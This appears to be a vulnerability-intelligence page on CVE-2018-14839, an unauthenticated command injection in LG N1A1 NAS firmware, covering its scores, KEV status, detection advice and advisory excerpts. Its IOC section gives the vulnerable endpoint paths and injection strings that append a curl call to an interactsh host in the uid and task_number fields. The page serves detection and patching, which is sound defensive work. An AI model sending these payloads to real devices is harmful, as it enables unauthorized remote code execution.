CVE-2018-14839
published 2019-05-14CVE-2018-14839: LG N1A1 NAS 3718.510 is affected by: Remote Command Execution. The impact is: execute arbitrary code (remote). The attack vector is: HTTP POST with parameters.
PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
89.35%
99.8th percentile
LG N1A1 NAS 3718.510 is affected by: Remote Command Execution. The impact is: execute arbitrary code (remote). The attack vector is: HTTP POST with parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lg | n1a1_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
path/system/sharedir.php
path/en/php/usb_sync.php
command&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
command&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
- →Monitor for HTTP POST requests to /system/sharedir.php or /en/php/usb_sync.php on LG NAS devices, particularly those containing shell metacharacters (semicolons) in the uid or task_number parameters, indicating command injection attempts.
- →The injection is pre-authentication — no valid session or credentials are required. Detect unauthenticated POST requests to the affected endpoints with parameter values containing command separators.
- →The attack uses the uid parameter in /system/sharedir.php and the task_number parameter in /en/php/usb_sync.php as injection points. Alert on values containing semicolons or other shell metacharacters in these fields.
- →Out-of-band detection: exploitation triggers outbound HTTP requests (e.g., curl) from the NAS device. Monitor for unexpected outbound HTTP connections originating from NAS devices.
- →Content-Type for the exploit is application/x-www-form-urlencoded. Correlate POST requests with this Content-Type to the vulnerable PHP endpoints.
- ·The Nuclei template targets two distinct endpoints; both should be covered in detection rules as exploitation stops at the first successful match.
- ·The affected version is specifically LG N1A1 NAS firmware 3718.510; detections should be scoped to this device/firmware where asset inventory is available. ↗
- ·This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active in-the-wild exploitation; prioritize detection and patching accordingly. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9h95-rv82-cwrc: LG N1A1 NAS 3718
ghsa_unreviewed·2022-05-24
CVE-2018-14839 [CRITICAL] CWE-78 GHSA-9h95-rv82-cwrc: LG N1A1 NAS 3718
LG N1A1 NAS 3718.510 is affected by: Remote Command Execution. The impact is: execute arbitrary code (remote). The attack vector is: HTTP POST with parameters.
VulnCheck
LG N1A1 NAS Remote Command Execution Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-14839 [CRITICAL] CWE-78 LG N1A1 NAS Remote Command Execution Vulnerability
LG N1A1 NAS Remote Command Execution Vulnerability
LG N1A1 NAS 3718.510 is affected by a remote code execution vulnerability.
Affected: LG N1A1 NAS
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-11&host_type=src&vulnerability=cve-2018-14839; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-04&host_type=src&vulnerability=cve-2018-14839; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2018-14839; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-
CISA
LG N1A1 NAS Remote Command Execution Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2018-14839 [CRITICAL] CWE-78 LG N1A1 NAS Remote Command Execution Vulnerability
Vulnerability: LG N1A1 NAS Remote Command Execution Vulnerability
Affected: LG N1A1 NAS
LG N1A1 NAS 3718.510 is affected by a remote code execution vulnerability.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-14839
Remediation Due Date: 2022-04-15
No detection rules found.
Nuclei
LG NAS Devices - Remote Code Execution
nuclei
CVE-2018-10818 LG NAS Devices - Remote Code Execution
LG NAS Devices - Remote Code Execution
LG NAS devices contain a pre-auth remote command injection via the "password" parameter.
Template:
id: CVE-2018-10818
info:
name: LG NAS Devices - Remote Code Execution
author: gy741
severity: critical
description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
remediation: |
Apply the latest firmware update provided by LG to mitigate this vulnerability.
reference:
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
- https://cve.mitre.or
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Threat Research Center
Threat Research
Cybercrime
## Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Yue Guan
Jin Chen
Leo Olson
Wayne Xin
Daiping Liu
Published: October 14, 2021
Cybercrime
Threat Research
Attack analysis
Exploit
Exploit in the wild
Interactsh
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh . This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC
2019-05-14
Published
2022-03-25
Added to CISA KEV
Exploited in the wild